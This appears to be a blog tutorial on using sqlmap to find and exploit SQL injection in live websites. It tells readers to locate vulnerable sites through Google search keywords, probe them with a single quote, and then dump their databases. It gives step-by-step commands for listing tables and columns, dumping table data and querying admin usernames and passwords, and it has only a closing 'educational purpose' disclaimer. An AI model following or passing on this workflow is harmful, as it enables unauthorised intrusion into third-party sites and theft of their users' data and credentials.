SQLMap - a powerful penetration testing tool
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
I enjoy searching vulnerabilities in sites which you can easily find with the help of Google Indexing, using this keyword -
This will list all the sites, that may have vulnerabilities in their database, this depends on type of command procedure you've used for scripting your database. I suggest hardening the database and use the proper code for to avoid the SQL Injection attacks! The screenshot below shows the sites listed by Google when we use the above keywords.
Links are hidden for good, however you can try it on you own :)
Now to check for the vulnerabilities of these sites, open any link and in the URL, after the digit enter a simple SQL closing tag - ' (single quotation mark) , then press enter, there you will SQL Exception, similarly you can try with another SQL keyword. I prefer using SQLMap CLI, available in Kali Linux or you get it from this link using terminal -
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
After successful download, run the following command to move to you SQLMap directory -
now try to test a sample site, using the following commands, let's first retrieve the database, use the following command -
python sqlmap.py -u 'http://samplesite.com/page.php?id=5'
running this command will give you database details, its version, Web Technology used, etc. You can also see all the parameters being passed while performing the injection.
To retrieve the table add --table attribute at the end of the above command as -
python sqlmap.py -u 'http://samplesite.com/page.php?id=5' --tables
This will list all the tables used in database, same way you can fetch all the columns of the selected table using the following command -
python sqlmap.py -u 'http://samplesite.com/page.php?id=5' -T sampleTable --columns
This will list the columns name of the table - "sampleTable", now if you want to dump the database, use the following command -
python sqlmap.py -u 'http://samplesite.com/page.php?id=5' -T sampleTable --dump
This will list all the data present inside that table. You can try with all other tables.. :)
Issues while testing -
If you get [CRITICAL] connection timed while the site runs normally -
SQLMap is very granular in terms of dumping entries from a table. The relevant switches are:
--dump - Dump DBMS database table entries.
-D - DB DBMS database to enumerate.
-T - TBL DBMS database table to enumerate.
-C - COL DBMS database table column to enumerate.
--start=LIMITSTART - First query output entry to retrieve.
However, in some cases you might want to dump all entries given a custom WHERE condition. For such cases, use one of the following switches:
--sql-query=QUERY - SQL statement to be executed.
--sql-shell - Prompt for an interactive SQL shell.
--sql-file=SQLFILE - Execute SQL statements from given file(s).
--sql-query "SELECT user, password FROM users WHERE privilege='admin'"
Note: Demo/Content for educational purpose only..